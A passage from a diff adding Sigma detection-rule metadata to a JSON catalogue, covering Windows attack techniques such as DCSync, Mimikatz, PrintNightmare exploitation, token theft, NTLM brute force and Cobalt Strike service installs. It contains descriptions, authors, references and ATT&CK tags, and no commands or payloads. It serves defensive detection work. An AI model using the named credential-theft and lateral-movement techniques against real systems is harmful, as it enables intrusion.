"https://twitter.com/OTR_Community/status/1371053369071132675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", + "value": "Exchange Set OabVirtualDirectory ExternalUrl Property" + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ ], + "filename": "win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "value": "MSExchange Transport Agent Installation - Builtin" + }, + { + "description": "Detects a failed installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "win_exchange_transportagent_failed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "value": "Failed MSExchange Transport Agent Installation" + }, + { + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/08", + "falsepositive": [ + "Legacy hosts" + ], + "filename": "win_susp_ntlm_auth.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" + ], + "tags": [ + "attack.lateral_movement", + 
"attack.t1550.002" + ] + }, + "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "value": "NTLM Logon" + }, + { + "description": "Detects common NTLM brute force device names", + "meta": { + "author": "Jerry Shockley '@jsh0x'", + "creation_date": "2022/02/02", + "falsepositive": [ + "Systems with names equal to the spoofed ones used by the brute force tools" + ], + "filename": "win_susp_ntlm_brute_force.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.varonis.com/blog/investigate-ntlm-brute-force", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "value": "NTLM Brute Force" + }, + { + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "meta": { + "author": "James Pemberton", + "creation_date": "2020/05/22", + "falsepositive": [ + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." 
+ ], + "filename": "win_susp_ntlm_rdp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "n/a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "value": "Potential Remote Desktop Connection to Non-Domain Host" + }, + { + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "meta": { + "author": "mdecrevoisier", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate administrator activity" + ], + "filename": "win_sshd_openssh_server_listening_on_socket.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.004" + ] + }, + "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "value": "OpenSSH Server Listening On Socket" + }, + { + "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", + 
"creation_date": "2021/06/30", + "falsepositive": [ + "Problems with printer drivers" + ], + "filename": "win_exploit_cve_2021_1675_printspooler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://twitter.com/fuzzyf10w/status/1410202370835898371", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", + "value": "Possible CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unknown" + ], + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MalwareJake/status/1410421967463731200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ] + }, + "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "value": "CVE-2021-1675 Print Spooler Exploitation" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + 
"meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": "Azure AD Health Monitoring Agent Registry Keys Access" + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access" + }, + { + "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "meta": { + "author": "Michaela Adams, Zach Mathis", + "creation_date": "2022/11/06", + "falsepositive": [ + "Anti-Virus" + ], + "filename": "win_security_access_token_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ] + }, + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse" + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "meta": { + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "creation_date": "2019/04/03", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ ], + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "filename": "win_security_account_discovery.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" + }, + { + "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_add_remove_computer.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags" + }, + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC" + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_admin_logon.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags" + }, + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon" + }, + { + "description": "Detect remote login by 
Administrator user (depending on internal pattern).", + "meta": { + "author": "juju4", + "creation_date": "2017/10/29", + "falsepositive": [ + "Legitimate administrative activity." + ], + "filename": "win_security_admin_rdp_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ] + }, + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon" + }, + { + "description": "Detects access to $ADMIN share", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/04", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_admin_share_access.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share" + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_object_writedac_access.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC Access" + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_replication_non_machine_account.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account" + }, + { + "description": "Detects access to a domain user from a non-machine account", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut)", + "creation_date": "2020/03/30", + "falsepositive": [ + "Administrators configuring new users." 
+ ], + "filename": "win_security_ad_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration" + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_active_directory_user_control.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects" + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_ad_user_backdoors.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors" + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "meta": { + "author": "@neu5ron", + "creation_date": "2017/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_alert_enable_weak_encryption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2053", + "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "value": "Weak Encryption Enabled and Kerberoast" + }, + { + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/31", + "falsepositive": [ + "Go utilities that use staaldraad awesome NTLM library" + ], + "filename": "win_security_alert_ruler.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ] + }, + "uuid": "24549159-ac1b-479c-8175-d42aea947cae", + "value": "Hacktool Ruler" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_chafer_mar18_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security" + }, + { + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "meta": { + "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_slingshot.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://securelist.com/apt-slingshot/84312/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ] + }, + "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "value": "Defrag Deactivation - Security" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "win_security_apt_wocao.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + 
"attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "value": "Remote Task Creation via ATSVC Named Pipe" + }, + { + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_camera_microphone_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/duzvik/status/1269671601852813320", + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "value": "Processes Accessing the Microphone and Webcam" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_cobaltstrike_service_installs.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", 
+ "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "value": "CobaltStrike Service Installations - Security" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research)", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe" + }, + { + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dcom_iertutil_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ] + }, + "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" + }, + { + "description": "Detects Mimikatz DC sync security events", + "meta": { + "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "creation_date": "2018/06/03", + "falsepositive": [ + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" + ], + "filename": "win_security_dcsync.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" + ] + }, + "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "value": "Mimikatz DC Sync" + }, + { + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "meta": { + "author": "@BarryShooshooga", + "creation_date": 